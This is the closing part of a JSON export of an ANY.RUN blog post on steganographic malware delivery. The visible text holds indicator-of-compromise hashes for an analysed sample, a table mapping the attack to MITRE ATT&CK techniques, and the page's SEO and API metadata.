plan.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/demo\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=stegomalware&amp;utm_content=demo&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">Request trial \u2192<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Appendices&nbsp;<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Appendix 1: IOC&nbsp;<\/h3>\n\n\n\n<p>Analyzed file:<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-35\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"5\"\n           data-wpID=\"35\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Name\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        9deec296-da80-4742-b491-0cce95066735\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        MD5\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        90F7A60FF7DBEE279B77F1CD12852AB5\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SHA1\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        E410EAD2770CE196EDF9386995CA3B65BA2601BA\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SHA256\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        82BA07E40FF6DDAC997318C88FC04F0940B4FDD16979FE7F2F37C2CF80800F0C\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SSDEEP\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        768:uO91WZoMDrFPKcdgeX52VRkWsKCWsKKWsKSWsKFcgtRbyNDNwWsKuWsKumRtCAdE:uO7WZdpEgWqWSWaWDWGWmDA1Xu1\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-35'>\ntable#wpdtSimpleTable-35{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-35 td, table.wpdtSimpleTable35 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\">Appendix 2: MITRE MATRIX&nbsp;<\/h3>\n\n\n\n<p>Without tactics and techniques used by downloaded malware samples.<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-36\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"8\"\n           data-wpID=\"36\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Tactics\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Techniques\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Description\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-merged-cell \"\n                     colspan=\"1\"  rowspan=\"2\"                     data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0001: Initial Access                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1566.001: Phishing. Spearphishing Attachment\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Send spearphishing emails with a malicious attachment\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                            <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1566.002: Phishing. Spearphishing Link\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Send spearphishing emails with a malicious link\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-merged-cell \"\n                     colspan=\"1\"  rowspan=\"2\"                     data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0002: Execution                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1203: Exploitation for Client Execution\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Exploit software vulnerabilities in client applications to execute code\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                            <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1059.005: Command and Scripting Interpreter: Visual Basic\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Abuse of command and script interpreters to execute commands, scripts, or binaries\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-merged-cell \"\n                     colspan=\"1\"  rowspan=\"3\"                     data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0005: Defense Evasion                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1027.010: Obfuscated Files or Information: Command\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-empty-cell \"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                                            <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                            <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Obfuscation\u00a0T1027.003: Obfuscated Files or Information: Steganography\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-empty-cell \"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                                            <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                            <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1218.009: System Binary Proxy Execution: Regasm\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C8\"\n                    data-col-index=\"2\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Bypass process and\/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries                     <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-36'>\ntable#wpdtSimpleTable-36{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-36 td, table.wpdtSimpleTable36 th { white-space: normal !important; }\n<\/style>\n\n","protected":false},"excerpt":{"rendered":"<p>UPD: The section &#8220;Additional tasks&#8221; has been updated to include a new November 2023 steganography campaign. Malware delivery techniques are always evolving to bypass security measures. Gone are the days when a scammer could simply send an executable file as an email attachment \u2014 today, it simply won&#8217;t get past email filters.\u00a0 Threat actors are [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":6058,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,34,40],"class_list":["post-6047","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Unpacking the Use of Steganography in Recent Malware Attacks - ANY.RUN&#039;s Cybersecurity Blog<\/title>\n<meta name=\"description\" content=\"Discover an analysis of steganographic malware and see what techniques attackers use to hide malicious code within images.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Stas Gaivoronskii\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\"},\"author\":{\"name\":\"Stas Gaivoronskii\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Unpacking the Use of Steganography in Recent Malware Attacks\",\"datePublished\":\"2023-10-24T05:34:04+00:00\",\"dateModified\":\"2023-12-01T07:48:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\"},\"wordCount\":1582,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\",\"name\":\"Unpacking the Use of Steganography in Recent Malware Attacks - ANY.RUN&#039;s Cybersecurity Blog\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2023-10-24T05:34:04+00:00\",\"dateModified\":\"2023-12-01T07:48:11+00:00\",\"description\":\"Discover an analysis of steganographic malware and see what techniques attackers use to hide malicious code within images.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Unpacking the Use of Steganography in Recent Malware Attacks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"Stas Gaivoronskii\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/09\/Stasphoto.png\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/09\/Stasphoto.png\",\"caption\":\"Stas Gaivoronskii\"},\"description\":\"Stas is a malware analyst at ANY.RUN. He has more than 11 years of experience in the digital forensics field and 4 years in malware analysis.\u00a0\",\"url\":\"#molongui-disabled-link\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Unpacking the Use of Steganography in Recent Malware Attacks - ANY.RUN&#039;s Cybersecurity Blog","description":"Discover an analysis of steganographic malware and see what techniques attackers use to hide malicious code within images.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/","twitter_misc":{"Written by":"Stas Gaivoronskii","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/"},"author":{"name":"Stas Gaivoronskii","@id":"https:\/\/any.run\/"},"headline":"Unpacking the Use of Steganography in Recent Malware Attacks","datePublished":"2023-10-24T05:34:04+00:00","dateModified":"2023-12-01T07:48:11+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/"},"wordCount":1582,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/","url":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/","name":"Unpacking the Use of Steganography in Recent Malware Attacks - ANY.RUN&#039;s Cybersecurity Blog","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2023-10-24T05:34:04+00:00","dateModified":"2023-12-01T07:48:11+00:00","description":"Discover an analysis of steganographic malware and see what techniques attackers use to hide malicious code within images.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"Unpacking the Use of Steganography in Recent Malware Attacks"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"Stas Gaivoronskii","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/09\/Stasphoto.png","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/09\/Stasphoto.png","caption":"Stas Gaivoronskii"},"description":"Stas is a malware analyst at ANY.RUN. He has more than 11 years of experience in the digital forensics field and 4 years in malware analysis.\u00a0","url":"#molongui-disabled-link"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/6047"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=6047"}],"version-history":[{"count":8,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/6047\/revisions"}],"predecessor-version":[{"id":6402,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/6047\/revisions\/6402"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/6058"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=6047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=6047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=6047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}